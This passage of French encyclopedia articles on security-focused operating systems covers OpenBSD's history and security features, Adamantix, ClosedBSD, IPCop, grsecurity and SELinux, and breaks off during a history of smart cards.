basés sur PowerPC, à partir de l'iMac; • mvme88k, systèmes VME basés sur Motorola 881x0; • sgi, stations de travail SGI MIPS ; • socppc, Machines à base de Freescale PowerPC SoC (processeur PowerQUICC) ; • SPARC, systèmes Sun SPARC de classe sun4, sun4e, sun4c et sun4m ; • SPARC64, systèmes Sun UltraSPARC et Fujitsu SPARC64 ; • VAX, systèmes Digital VAX ; • Zaurus, Sharp Zaurus C3x00 PDAs. •• 3 plates-formes matérielles en sommeil : • hp300, stations de travail Hewlett-Packard HP 9000 séries 300 et 400 ; • mvme68k, systèmes VME basés sur Motorola 680x0 ; • Palm. •• 4 plates-formes matérielles en cours de portage : • aviion, systèmes AViiON Data General basés sur Motorola M881x0 ; • beagle, systèmes basés sur le OMAP3x BeagleBoard ; • hppa64, systèmes Hewlett-Packard avec Architecture de Précision (PA-RISC) 64 bits ; • solbourne, Systèmes Solbourne IDT "Sparc-like" S3000, S4000 et S4000DX. •• 7 plates-formes matérielles historiques : • amiga, Systèmes Amiga et DraCo avec MMU (interrompu après la version 3.2); • arc, Systèmes MIPS R4k et R5k compatibles ARC (interrompu après la version 2.3); • cats, Carte d'évaluation StrongARM 110 (interrompu après la version 4.0); • mac68k, Apple Macintosh avec MMU basés sur Motorola 680x0 (interrompu après la version 4.6); • pegasos, Machines Pegasos de Genesi Sarl. Cartes mères à base de PowerPC et de processeur VIA (avorté) ; • pmax, Systèmes basés sur Digital Equipment Corporation MIPS (interrompu après la version 2.7); • sun3, systèmes Sun de classe Sun-3 (interrompu après la version 2.9). OpenBSD supporte également l'émulation des binaires Linux (i386 uniquement). Le projet est coordonné par Theo de Raadt de sa maison à Calgary, Alberta, Canada, et la mascotte du projet est Puffy, un diodon. OpenBSD 251

Histoire Theo de Raadt était le cofondateur de NetBSD, et membre de l'équipe de développement. En 1994, l'équipe lui demanda de démissionner et son accès au CVS fut révoqué. Les raisons de cette éviction restent incertaines à ce jour, mais plusieurs autres membres de l'équipe de NetBSD ont évoqué des problèmes de relations avec de Raadt. Il lui était notamment reproché d'être désagréable avec les utilisateurs en employant un ton agressif sur les listes de discussion de NetBSD.

La personnalité de Theo de Raadt Aux dires de nombreuses autres personnalités du logiciel libre, dont Linus Torvalds, celle de Theo de Raadt est réputée comme étant franche et difficile. Ses prises de positions tranchées sont source de conflits, et sont parfois considérées comme blessantes. De Raadt déclarait ceci à propos du système d'exploitation GNU/Linux dans une interview au journal Forbes : « C'est terrible [...] Tout le monde l'utilise, et ils ne réalisent pas à quel point il est mauvais. Et les utilisateurs de Linux s'en contenteront et l'étofferont plutôt que de prendre du recul et de dire "C'est n'importe quoi et nous devrions y remédier". »[8] Bien que sa personnalité laisse rarement indifférent, la plupart des commentateurs s'accordent à reconnaître en Theo de Raadt un programmeur talentueux et un gourou de la sécurité. Sa spontanéité, que certains apprécient, s'est illustrée dans ce conflit avec l'équipe de NetBSD, dont la plupart des membres gardent encore aujourd'hui le silence sur cet épisode[9]. À l'inverse, Theo de Raadt répondit à toutes les questions qui lui furent posées, et mit à disposition les courriels échangés et les logs des salons de discussion avec l'équipe de NetBSD.

Une démission contrainte Theo de Raadt ne fut pas exclu d'emblée du projet NetBSD. Le dépôt CVS de ce projet nécessite différents niveaux de droits en lecture et en écriture. En tant que cofondateur et deuxième contributeur le plus actif, de Raadt disposait d'un accès en lecture et écriture sur la base du système. L'équipe de NetBSD lui retira alors la possibilité d'envoyer directement des modifications dans le dépôt, et de rendre ces changements permanents. De Raadt était alors contraint d'envoyer chacune de ses contributions par courriel à un membre de l'équipe pour examen. De Raadt considéra cette mesure comme abusive et essaya vainement de recouvrer un plein accès au dépôt CVS de NetBSD. L'équipe de développement voulant s'assurer que ses contributions seraient « positives », elle proposa à de Raadt plusieurs solutions parmi lesquelles une lettre à signer, résumant les conditions, les droits et les devoirs de de Raadt. Après plusieurs mois de disputes sur les listes de discussion du projet, de Raadt démissionna officiellement et créa en 1994 le système d'exploitation OpenBSD d'après la version 1.0 de NetBSD, comme l'en autorisait la licence.

La création d'OpenBSD Après la création d'OpenBSD, chaque projet essaya d'attirer à lui des développeurs. Deux camps quasi hermétiques se formèrent rapidement, et plusieurs développeurs de NetBSD suivirent de Raadt. Ce dernier s'aperçut qu'un certain nombre de courriels et de lettres publiées sur son site web personnel avaient disparu. Bien qu'il refusa formellement d'incriminer des membres de l'équipe de NetBSD, Theo de Raadt décida d'examiner la sécurité de NetBSD, qu'il jugea déficiente. Peu après la création d'OpenBSD, Theo de Raadt fut contacté par Secure Networks inc. (ou SNI), une société locale de logiciels de sécurité qui développait un outil d'audit de la sécurité réseau nommé Ballista (renommé en Cybercop Scanner après le rachat de SNI par Network Associates), destiné à trouver et à essayer d'exploiter les possibles failles de sécurité d'un logiciel. Ceci coïncida avec l'intérêt propre de De Raadt dans la sécurité : les deux parties décidèrent ainsi de coopérer, dans une relation particulièrement bénéfique qui conduisit à la publication d'OpenBSD 2.3. OpenBSD 252

La sécurité et l'audit du code Pour plus de détails sur cette section, reportez-vous à la page OpenBSD security features [10] [EN]. Cette coopération permit également au projet de se concentrer sur un point précis : les développeurs OpenBSD devraient essayer de faire ce qui est correct, propre et sécurisé, même au détriment de la facilité d'utilisation, de la vitesse ou des fonctionnalités. Les failles d'OpenBSD devenant plus difficilement détectables et exploitables, l'entreprise de sécurité statua que l'audit de code était devenu trop difficile et peu rentable. Après des années de coopération, les deux parties s'accordèrent à penser que leurs objectifs communs avaient été atteints et se séparèrent.

L'argument du faible nombre de failles exploitables à distance Jusqu'en juin 2002, le site web d'OpenBSD affichait le slogan suivant : « Cinq ans sans vulnérabilité à distance dans l'installation par défaut ! » En juin 2002, Mark Dow de la société Internet Security Systems découvrit une faille dans le code d'OpenSSH qui implémentait l'authentification par question. Ce fut la première vulnérabilité découverte dans l'installation par défaut d'OpenBSD qui permet à un attaquant d'accéder à distance au compte superutilisateur. L'usage répandu d'OpenSSH à ce moment était à l'origine de la gravité de la faille, qui affectait un nombre considérable d'autres systèmes d'exploitation. Ce problème nécessita l'ajustement du slogan du site web d'OpenBSD : « Une seule vulnérabilité à distance dans l'installation par défaut, en 6 ans ! » Cette affirmation a été critiquée du fait du peu de logiciels activés dans l'installation par défaut d'OpenBSD, et du fait également que des failles distantes avaient été découvertes après la publication d'une version. Toutefois, le projet insiste sur le fait que le slogan fait référence à l'installation par défaut, et qu'il est donc correct à ce niveau. Une des idées fondamentales sous-jacentes à OpenBSD est de concevoir un système simple, propre et sécurisé par défaut. Par exemple, les réglages minimaux par défaut correspondent à la pratique standard en sécurité informatique qui consiste à activer aussi peu de services que possible sur les systèmes en production, et le projet pratique des audits de codes considérés comme étant des éléments importants de la sécurité d'un système. En mars 2007, la découverte d'une nouvelle faille dans OpenBSD[11], se situant dans la pile IPv6, nécessita le remplacement du slogan par : « Uniquement deux vulnérabilités à distance dans l'installation par défaut, en plus de 10 ans ! » À la sortie de la 4.5 le 30 avril 2009, le compte des années est retiré : « Seulement deux vulnérabilités à distance dans l'installation par défaut, depuis diablement longtemps ! »

Les principales fonctionnalités de sécurité OpenBSD inclut un grand nombre de fonctionnalités spécifiques destinées à améliorer la sécurité, notamment : • des modifications des API et des toolchains, tels que les fonctions strlcpy et strlcat, et une vérification des static bounds ; • des techniques de protection de la mémoire pour empêcher les accès invalides, tels que ProPolice, StackGhost, et des fonctionnalités de protection des pages mémoires W^X (W xor X), et des modifications de malloc ; • des fonctionnalités de cryptographie et de génération de nombres aléatoires, notamment par des améliorations de la couche réseau et l'ajout de l'algorithme Blowfish pour le chiffrement des mots de passe. OpenBSD 253

La gestion des privilèges Pour réduire le risque d'une vulnérabilité ou d'une mauvaise configuration permettant l'usurpation de privilèges, certains programmes ont été écrits ou adaptés pour utiliser la séparation des privilèges, la révocation des privilèges ou la mise en cage (chroot). La séparation des privilèges est une technique, pionnière sur OpenBSD et inspirée du principe du moindre privilège, dans lequel un programme est divisé en deux ou plusieurs parties, dont l'une effectue les opérations privilégiées, et l'autre — presque toujours le reste du code — fonctionne sans privilège. La révocation des privilèges est similaire et implique qu'un programme réalise toutes les opérations nécessaires avec les privilèges avec lesquels il a été lancé, puis qu'il abandonne ces privilèges. La mise en cage implique de restreindre l'environnement d'exécution d'un programme à une partie du système de fichiers, l'interdisant ainsi d'accéder à des zones qui contiennent des fichiers systèmes ou privés. Les développeurs ont appliqué ces fonctionnalités aux versions OpenBSD des applications communes, notamment tcpdump et le serveur web Apache, lequel n'est qu'une version 1.3 lourdement modifiée en raison de problèmes de licences avec la série Apache 2.

Audits de code Le projet suit une politique d'audit permanent du code à la recherche de problèmes de sécurité, un travail que le développeur Marc Espie décrit comme « jamais terminé […] plus une question de processus que de recherche d'un bug spécifique. » Ce dernier a d'ailleurs produit une liste de plusieurs étapes typiques à suivre lorsqu'un bug est détecté, notamment l'examen complet des sources à la recherche de problèmes identiques et similaires, « [en] essayant de déterminer si la documentation nécessite d'être amendée », et en enquêtant pour savoir « s'il est possible d'améliorer le compilateur pour produire des avertissements sur ce problème spécifique. » À l'instar de DragonFly BSD, OpenBSD est l'un des deux systèmes d'exploitation libres dont la politique est de rechercher du code C au format classique pre-ANSI, et de le convertir en son équivalent moderne ANSI. Ceci ne doit pas impliquer des changements de fonctionnalités et n'est réalisé qu'à des fins de lisibilité et de cohérence. Un standard de style, le Kernel Normal Form, qui dicte quelle doit être la forme du code pour faciliter sa maintenance et sa compréhension, doit être appliqué à tout code avant qu'il ne puisse être inclus dans le système d'exploitation de base. Le code existant est sans cesse mis à jour pour correspondre à ces conventions de style.

Le nom Le nom OpenBSD vient de l'aventure NetBSD de Theo de Raadt. En effet le CVS de NetBSD n'était pas accessible aux non-développeurs officiels ; seules les releases étaient diffusées. Pour son fork, Theo de Raadt a mis en place un serveur CVS public : tout le monde peut accéder aux dernières sources du projet.

Mascotte Comme les autres BSD (FreeBSD et NetBSD), OpenBSD a pour mascotte le BSD Daemon (alias Beastie). Il a aussi comme mascotte propre le Blowfish, alias Puffy. Cette dernière est une référence à l'algorithme cryptographique de Bruce Schneier du même nom (utilisé entre autres par OpenSSH) : son graphisme attrayant associé à l'aspect défensif impressionnant du diodon hérissé de pointes l'ont rendue très populaire. Chaque version d'OpenBSD est accompagnée d'un morceau de musique ainsi que d'une planche de bande dessinée mettant généralement en scène Puffy. Il existe depuis peu des dérivés du Blowfish dessinés façon manga, Sushi Fugu et Harisenbon. OpenBSD 254

État du projet OpenBSD est actuellement en version 5.3 (depuis le 1er mai 2013). L'équipe réalise une version tous les 6 mois. L'équipe de développement met en avant le fait que le système n'a été victime que de 2 failles de sécurité exploitables à distance dans l'installation par défaut depuis 1997. D'après un message déposé sur undeadly.org, le projet OpenBSD aurait subi des pertes financières de l'ordre de 20 000 USD par an en 2004 et en 2005[12].

Point de vue utilisateur Il faut noter que bien des utilisateurs ne connaissent pas OpenBSD et préfèrent donc se tourner vers les unix-like plus populaires, comme Gnu/linux ou FreeBSD. Les utilisateurs d'OpenBSD sont plutôt des gens habitués aux environnements Unix, (au sens large du terme), et sont de fait à l'aise. Les utilisateurs classiques, grand public, croient souvent que les BSD sont proches des Unix propriétaires, et plus complexes. Pour d'autres c'est la peur de ne pas avoir accès à l'aide de la communauté, or c'est justement parce que la communauté est peu volumineuse, qu'elle est toujours d'une grande pertinence répondront certains. La seconde erreur d'appréciation des utilisateurs grand public, c'est souvent de croire que les applications courantes ne sont pas disponibles sous OpenBSD. Pourtant il existe un très grand nombre de packages, et de ports. Enfin il reste aussi la possibilité d'utiliser les sources et de les compiler.

Autres projets L'équipe d'OpenBSD travaille également sur d'autres projets qui deviennent des pièces à part entière de l'OS et qui sont également portés (ou portables) sur d'autres systèmes d'exploitation. Parmi ces projets en cours, on peut citer : • OpenSSH : implémentation de SSH, le protocole de communication sécurisée. C'est le projet le plus connu du groupe. • OpenBGPD : implémentation sécurisée du service de routage BGP ; • OpenNTPD : implémentation simplifiée et sécurisée du service de synchronisation horaire NTP ; • OpenCVS : implémentation simplifiée et sécurisée du protocole CVS ; • OpenSMTPD : implémentation sécurisée du protocole SMTP, afin de remplacer sendmail ; • Le pare-feu et la suite logicielle Packet Filter (pf), qui sont maintenant intégrés dans la plupart des systèmes BSD. En outre, diverses Interface de programmation sécurisées, comme strlcat(3), strlcpy(3), strtonum(3) ou encore arc4random(3) sont fournies. Ces API sont souvent reprises dans d'autres logiciels ou systèmes d'exploitation.

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=OpenBSD& action=edit

[2] Liste des plates-formes supportées (http:/ / www. openbsd. org/ fr/ plat. html)

[3] Modèle de licence (http:/ / ftp. usa. openbsd. org/ pub/ OpenBSD/ src/ share/ misc/ license. template)

[4] OpenBSD - Politique de Copyright (http:/ / www. openbsd. org/ fr/ policy. html)

[5] http:/ / www. openbsd. org/ 53. html

[6] http:/ / www. openbsd. org/ fr/ index. html

[7] http:/ / fr. wikipedia. org/ w/ index. php?title=OpenBSD& action=edit& section=0

[8] De Raadt Theo in « Is Linux For Losers? (http:/ / www. forbes. com/ intelligentinfrastructure/ 2005/ 06/ 16/ linux-bsd-unix-cz_dl_0616theo. html) », Forbes, 2005.

[9] Wayner Peter, « 18.3 Flames, fights, and the birth of OpenBSD (http:/ / www. jus. uio. no/ sisu/ free. for. all. peter. wayner/ 18. html#987) »

in Free for all (http:/ / www. jus. uio. no/ sisu/ free. for. all. peter. wayner/ ), 2000.

[10] http:/ / en. wikipedia. org/ wiki/ OpenBSD_security_features OpenBSD 255

[11] OpenBSD's IPv6 mbuf's remote kernel buffer overflow (http:/ / www. coresecurity. com/ ?action=item& id=1703) (13 mars 2007)

[12] OpenBSD finances (http:/ / www. undeadly. org/ cgi?action=article& sid=20060321034114), undeadly.org, 21 mars 2006, consulté le 11 juillet 2009

Adamantix

Adamantix, aussi connue sous le nom de Trusted Debian, est un ancien[1] système d'exploitation GNU/Linux, basé sur Debian, et orienté sécurité. Cette distribution n'est plus disponible actuellement. De nombreuses distributions Linux choisissent d'opter pour la vitesse et la richesse en termes de fonctionnalités, mais sans se soucier trop de la sécurité ; Adamantix au contraire était centrée sur la sécurité avec notamment : • Des protections contre les attaques utilisant des débordements, en utilisant PaX et SSP ; • un contrôle avancé du système à l'aide de RSBAC (Rule Set Based Access Control).

Références

[1] Distributions basées sur Debian (http:/ / www. debian. org/ misc/ children-distros. fr. html)

ClosedBSD

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

ClosedBSD est un dérivé de FreeBSD destiné à fournir un pare-feu (firewall) et des services NAT. ClosedBSD est disponible comme une image de disquette de 1.4 Mo et comme une image ISO de CD-ROM de 12.8 Mo. Malgré sa petite taille, le logiciel inclut une interface basée sur ncurses entièrement fonctionnelle. Un des avantages de ClosedBSD est qu'il peut être lancé directement depuis une disquette ou un CD-ROM, sans aucun disque dur requis. Il peut aussi fonctionner sur du matériel relativement vieux ; la version sur disquette requiert un ordinateur de type x86 avec une mémoire vive (RAM) d'au moins 8 Mo, alors que la version sur cédérom a besoin d'au minimum 32 Mo de mémoire vive. ClosedBSD est distribué sous les termes de la licence BSD.

Lien externe • (en) Site officiel [1] (site fermé depuis le 09/05/07)

• Portail de la sécurité informatique

Références

[1] http:/ / www. closedbsd. org/ IPCop 256 IPCop

Cet article doit être wikifié (septembre 2012). La mise en forme de son texte ne suit pas les recommandations Wikipédia (style, typographie, liens internes, etc. – vérifier la page de discussion où ces motifs peuvent avoir été précisés). Téléchargez le guide de syntaxe et [1] modifiez !

Cet article ne cite pas suffisamment ses sources (septembre 2012). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

IPCop

Logo

Famille Linux

Type de noyau Monolithique

État du projet en développement

Plates-formes i486

Entreprise / Équipe IPCop Développeur

Licence GPL

États des sources Logiciel libre et open source

Dernière version stable 2.0.6 (le 28 octobre 2012)

Interface utilisateur par défaut Interface web

Site web [2] www.ipcop.org

[3] modifier

IPCop est une distribution Linux basée sur Linux From Scratch[4], faisant office de pare-feu. Elle vise à fournir un moyen simple mais puissant pour configurer un pare-feu sur une architecture de type PC. Elle peut protéger sur une telle architecture un réseau familial ou de petites ou moyennes entreprises, elle offre la classique Zone démilitarisée ainsi que les tunnels réseau privé virtuel (acronyme VPN en anglais). IPCop peut également servir de serveur mandataire (proxy), serveur fournissant des adresses IP dynamique (DHCP), de relais DNS, de serveur de temps (NTP), et en installant des greffons ou modules, de bien d'autres choses (contrôle de contenu, liste noire, liste d'accès, DNS dynamique, contrôle de trafic, etc.). Le support des clients sans fil est aussi prévu par le biais d'une zone dédiée. À l'origine, IPCop était un fork de la distribution Linux Smoothwall, depuis ces deux projets se sont développés indépendamment, et maintenant divergent de manière importante. IPCop est sous licence GPL, en open source. Les images ISO des CD-ROM d'installation (moins de 50 Mo en janvier 2007) sont disponibles via un réseau de sites miroirs. Le support est disponible en langue anglaise, française, allemande et hollandaise. L'interface utilisateur d'IPCop est disponible dans 24 langues différentes. IPCop 257

Une machine très bas de gamme permet de le mettre en œuvre, voici un exemple d'une telle configuration : •• 2 interfaces réseau minimum (Ethernet 10/100 ou modem ADSL tout type) • Microprocesseur à 200Mhz • Mémoire vive 64 Mo • Disque dur 800 Mo •• Lecteur CD-ROM Optionnellement : •• 2 autres interfaces ethernet pour la DMZ et le wifi •• Clé USB (installation) et disquette, clé USB (pour la sauvegarde). •• clavier, écran pour l'installation Cette configuration minimale convient pour une utilisation domestique ou de petites entreprises jusqu'à 5 postes. Elle permet déjà d'utiliser la fonctionnalité de proxy et le système de détection d'intrusion (tous deux gourmand en ressource mémoire et en calcul processeur). Prévoir une configuration plus musclée pour le processeur et la mémoire vive pour une utilisation professionnelle. IPCop peut fonctionner avec les fonctionnalités de base sur une architecture de type Intel 386 muni de 32 Mo de mémoire vive seulement. Architecture fonctionnelle de IPCOP : IPCOP, dans ses récentes versions, défini 4 ports ethernets (donc 4 réseaux indépendants) : •• 1 Réseau ROUGE, relié a internet (réseau obligatoire). •• 1 Réseau VERT, relié au réseau local utilisateur, tres sécurisé (obligatoire bien sur !). • 1 Réseau ORANGE, relié à la D.M.Z. ("demilitarized zone" ou zone démilitarisée), facultative. Cette zone est reliée, par exemple à des serveurs WEB, à des caméras I.P. ou autre dispositifs ethernets accessibles (potentiellement !) depuis internet. •• 1 Réseau BLEU, relié à des dispositifs "WiFi" ou pouvant servir de seconde D.M.Z. Cette zone est spécialisée par le paramétrage possible de l'adresse MAC ou I.P. des périphériques autorisés à s'y connecter (selon la configuration de IPCOP, bien sur). Le paramétrage général de IPCOP (réalisé en mode serveur WEB par exemple) permet de gérer les flux autorisés entre ces différentes zones/réseaux, et les exceptions. À son installation IPCOP fournit un paramétrage standard, bien souvent suffisant et totalement fonctionnel. Il faut noter que les versions initiales de IPCOP ne géraient que les réseaux ROUGE et VERT.

Versions

Version Date

0.0.9 28 décembre 2001

0.1.0 3 janvier 2002

0.1.1 22 janvier 2002

1.2.0 27 décembre 2002

1.3.0 22 avril 2003

1.4.0 1er octobre 2004

1.4.1 21 novembre 2004

1.4.2 16 décembre 2004

1.4.4 15 mars 2005 IPCop 258

1.4.5 30 mars 2005

1.4.6 11 mai 2005

1.4.8 26 août 2005

1.4.9 4 octobre 2005

1.4.10 9 novembre 2005

1.4.11 23 août 2006

1.4.12 16 janvier 2007

1.4.13 16 janvier 2007

1.4.14 4 mars 2007

1.4.15 9 mars 2007

1.4.16 17 juillet 2007

1.4.18 1er décembre 2007

1.4.21 24 juillet 2008

2.0.0 23 septembre 2011

2.0.1 7 novembre 2011

2.0.2 18 novembre 2011

2.0.3 14 février 2012

2.0.4 16 février 2012

2.0.5 27 octobre 2012

2.0.6 28 octobre 2012

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=IPCop& action=edit

[2] http:/ / www. ipcop. org/

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=IPCop& action=edit& section=0

[4] IPCop : Changelog de la version 1.4.0 (http:/ / ipcop. org/ index. php?name=News& file=article& sid=5) : « Le système de base utilise LFS (Linux from Scratch) » Grsecurity 259 Grsecurity

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

grsecurity est une modification augmentant la sécurité pour le noyau Linux distribué sous la licence publique générale GNU. Il inclut différents éléments, dont PaX, un système de contrôle d'accès à base de rôles et différents moyen de renforcer la sécurité générale du noyau.

Histoire Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [1] est la bienvenue ! Suite à la perte de son principal sponsor, Brad Spengler annonce, le 27 décembre 2008, que le développement du projet pourrait être arrêté[2],[3]. Toutefois, il semble que le développement continue à un rythme aussi soutenu qu'auparavant après une phase où les contributions se faisaient plus rares entre janvier et mars 2009.

Fonctionnalités

Contrôle d'accès à base de rôles Il s'agit d'un système de contrôle d'accès obligatoire (de l'anglais, Mandatory access control). Il est utilisé par exemple dans le cas où il est utile de restreindre l'accès à certaines ressources au seul utilisateur root (qui a normalement accès à toutes les ressources). La politique de sécurisation de grsecurity se démarque des autres modèles de sécurité en cela qu'elle ne prétend pas trouver et retirer les failles existantes, mais les rendre inutiles. Ainsi, chaque processus d'un système peut être limité à ne pouvoir effectuer que les tâches pour lesquelles l'administrateur l'y autorise, espérant ainsi éviter qu'un attaquant puisse compromettre le système tout entier. Ce patch de sécurité suppose donc que le noyau Linux est exempt de bug exploitable.

PaX De plus, grsecurity inclut PaX, un patch permettant de renforcer la sécurité du système en activant les pages non exécutables et en rendant l'espace d'adressage mémoire aléatoire.

Autres modifications grsecurity offre différents moyen d'améliorer l'audit du noyau Linux. Il est ainsi possible d'auditer certains utilisateurs ou groupes, les opérations de montage, etc. Ce patch rend aussi possible de renforcer la sécurité lors de l'utilisation de chroot, permettant de rendre plus difficile de s'échapper de ce type de cage. Grsecurity 260

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Grsecurity& action=edit

[2] Brad Spengler, New (final?) grsecurity release and important announcement (http:/ / article. gmane. org/ gmane. linux. kernel. grsecurity/ 1030), 27 décembre 2008

SELinux

Security-Enhanced Linux, abrégé SELinux, est un Linux security module (LSM), qui permet de définir une politique de contrôle d'accès obligatoire aux éléments d'un système issu de Linux. Son architecture dissocie l'application de la politique d'accès et sa définition. Il permet notamment de classer les applications d'un système en différents groupes, avec des niveaux d'accès plus fins. Il permet aussi d'attribuer un niveau de confidentialité pour l'accès à des objets systèmes, comme des descripteurs de fichiers, selon un modèle de sécurité multiniveau (MLS pour Multi level Security). SELinux utilise le modèle Bell LaPadula complété par le mécanisme Type enforcement de contrôle de l'intégrité, développé par SCC. Il s'agit d'un logiciel libre, certaines parties étant sous licences GNU GPL et BSD[1].

Historique La NSA a besoin de logiciels de Multi-Level Security (MLS) pour conserver ses informations secrètes. Multi-Level Security consiste à permettre à des données avec différents niveaux de classification de coexister sur la même machine. C'est un problème complexe, difficile à mettre en œuvre, nécessitant un processus de certification lourd et qui intéresse essentiellement un seul type de client : les gouvernements. De plus, une fois installé, il est difficile de changer de système et donc la probabilité de se retrouver enfermé dans une solution est grande. Ce sont les conditions parfaites pour que se développent des logiciels propriétaires très chers, qui n'innovent pas.[évasif] Afin de réduire les coûts, de stimuler l'innovation, et de donner accès à ce type de logiciel au secteur privé (banques, services de santé, etc.) pour se protéger des pirates informatiques, Stephen Smalley de la NSA a décidé d'utiliser l'open source[2].[évasif] Il est parti des prototypes de recherche (prototypes DTMach, DTOS[3], projet FLASK[4]) réalisés avec SCC et l'université d'Utah aux USA[5] et les a publiés sous licence GPL. L'objectif est la formation d'une communauté de chercheurs, d'utilisateurs et d'entreprises pour améliorer le logiciel et fournir des solutions avancées.

Utilisation En pratique, la base de l'innovation est de définir des attributs étendus dans le système de fichiers UNIX. En plus de la notion de "droits de lecture, écriture, exécution" pour un usager donné, SELinux définit pour chaque fichier ou processus : •• Un usager virtuel (ou collection de rôles) ; •• Un rôle ; •• Un contexte de sécurité. Les commandes « système » sont étendues pour pouvoir manipuler ces objets et définir des politiques (règles d'accès), et des statuts (niveau de confidentialité). Par exemple la commande « ls -Z » fait apparaître les dits attributs étendus, soit :

ls -Z /etc/passwd

donne

-rw-r--r-- root root system_u:object_r:etc_t /etc/passwd SELinux 261

Une distribution Linux peut être livrée avec des politiques prédéfinies pour la totalité du système (mode strict), ou une partie des services / applications (mode ciblé ou targeted). Le réglage d'un certain nombre de variables booléennes prédéfinies permet de personnaliser le comportement des applications correspondantes.

Notes et références

[1] Présentation de SELinux (http:/ / www. nsa. gov/ research/ selinux/ index. shtml) sur le site de la NSA

[2] Historique de la libération de SELinux par la NSA (http:/ / www. opensourceforamerica. org/ case-studies/ nsa)

[3] Projet DTOS (http:/ / www. cs. utah. edu/ flux/ fluke/ html/ dtos/ HTML/ dtos. html)

[4] Projet FLASK (http:/ / www. cs. utah. edu/ flux/ fluke/ html/ flask. html)

[5] Security-Enhanced Linux (http:/ / www. nsa. gov/ research/ selinux/ ) 262

8-Matériel de sécurité informatique

Carte à puce

Une carte à puce est une carte en matière plastique, voire en papier ou en carton, de quelques centimètres de côté et moins d'un millimètre d'épaisseur[1], portant au moins un circuit intégré capable de contenir de l'information. Le circuit intégré (la puce) peut contenir un microprocesseur capable de traiter cette information, ou être limité à des circuits de mémoire non volatile et, éventuellement, un composant de sécurité (carte mémoire). Les cartes à puce sont principalement utilisées comme moyens d'identification personnelle (carte d'identité, Carte à puce utilisée pour le remboursement des badge d'accès aux bâtiments, carte d'assurance maladie, carte SIM) ou soins de santé en France (carte Vitale). de paiement (carte bancaire, porte-monnaie électronique) ou preuve d'abonnement à des services prépayés (carte de téléphone, titre de transport); voir ci-dessous. La carte peut comporter un hologramme de sécurité pour éviter la contrefaçon. La lecture (l'écriture) des données est réalisée par des équipements spécialisés, certaines puces nécessitant un contact physique (électrique), d'autres pouvant fonctionner à distance (communication par ondes radio).

Histoire Carte Bull à micro-processeur monochip (1983). Dès 1947, une mémoire portative est décrite par un ingénieur britannique : un substrat en bakélite sur lequel sont imprimées de très fines pistes de cuivre qui, sous l'effet d'un courant important, se volatilisent irréversiblement, créant un effet mémoire. Il est question, à l'époque, de 64 bits. En 1968, Helmut Gröttrup et Jürgen Dethloff, deux ingénieurs de l'entreprise allemande Giesecke & Devrient, inventent une carte automatique dont le brevet ne sera finalement accordé qu'en 1982. En 1969, les Américains Halpern, Castrucci, Ellingboe, notamment[2] contribuent à la genèse de la mémoire portative[réf. nécessaire]. Le premier brevet concernant un dispositif de type carte à puce (mémoire sécurisée) est déposé le 25 mars 1974 par Roland Moreno, qui par la suite pour exploiter ce brevet transforme en SARL la SA Innovatron, elle-même issue d'une association loi 1901 homonyme née en 1972. En mars puis mai 1975, Moreno développe par plusieurs certificats d'addition les moyens inhibiteurs revendiqués dans le premier brevet et étend la protection internationalement[3] : •• comparaison interne du code confidentiel ; • compteur d’erreurs, qui provoque l’auto-destruction de la puce en cas de soumission répétée d’un code faux : un code inexact provoque la destruction d'un fusible en mémoire, d'où une surconsommation électrique importante. •• moyens de traitement ; •• lecture irréversiblement impossible de zones prédéterminées, notamment code confidentiel, clés, etc. ; •• écriture, modification, effacement irréversiblement impossibles de zones prédéterminées de la mémoire. Carte à puce 263

Ces moyens inhibiteurs prévus dès 1974 n'ont été installés industriellement qu'en 1983. L'agencement d'un circuit intégré ASIC est en effet une lourde opération industrielle qui ne se justifie nullement en l'absence d'un risque de fraude massive. En 1975, la Compagnie Honeywell Bull, compagnie sous la tutelle de France Télécom, dépose de son côté une demande de brevet pour une carte portative du type carte de crédit également, comprenant au moins un dispositif de traitement de signaux électriques disposé à l’intérieur de la carte. Les Français Bernard Badet, François Guillaume, et Karel Kurzweil y sont désignés inventeurs. La protection industrielle sera étendue à onze autres pays[4]. En 1977, l'Allemand Dethloff dépose un brevet pour une carte à mémoire portative dont les moyens inhibiteurs seraient constitués par un microprocesseur. Ce perfectionnement significatif autorisant un changement de fonctions de la carte par simple reprogrammation (fonderie sur la base d'un masque spécifique). Aujourd'hui, plus des trois quarts des cartes à puce en service sont dotées d'un microprocesseur ou d'un microcontrôleur. Quelques mois plus tard, le Français Ugon dépose pour le compte de son employeur Bull un brevet sur une technique comparable, nommée CP8, pour « Circuit Portatif des années 80 », qui ne donnera lieu à une activité industrielle qu'à partir du début des années 1990, tout en engendrant le dépôt de plus de 1200 brevets. En 1978, la Direction générale des télécommunications (DGT, qui deviendra France Telecom) organise elle-même dès 1978 la mise au point des prototypes, la réalisation des cartes et des terminaux points de vente, et elle impulse la constitution la même année d'un groupement d'intérêt économique (GIE) intitulé Carte à Mémoire et regroupant autour d’elle dix banques françaises[5]. En 1979, le géant des services pétroliers Schlumberger entre au capital d’Innovatron, pour 23 %, puis 34 %, il devient par la suite numéro 1 mondial de la carte à puce, absorbant notamment ses deux plus lourds concurrents français : Solaic en 1997 puis Bull CP8 en 2001. À signaler cependant que, avant ces absorptions, via Innovacom qui lui appartient, France Telecom était entrée en 1989 dans le capital de la société Innovatron, qu’alors l’augmentation de capital opérée lors de la fusion des deux protagonistes avait multiplié par quinze celui-ci (porté à 7,6 millions d’euros)[6]. Des moyens considérables ont été déployés à partir de la fin des années 1970 par Philips, IBM et Siemens pour tenter de faire annuler les brevets de Roland Moreno, en vain. En 1981, le GIE Carte à Mémoire lance trois expérimentations de la carte à puce, respectivement à Blois avec Bull, Caen avec Philips, et Lyon avec Schlumberger. La première diffusion massive de la carte à puce auprès du grand public débutera en 1983 avec la mise en place de la Télécarte, une carte à puce destiné à être utilisée dans les cabines téléphoniques françaises. À la fin des années 1980, le 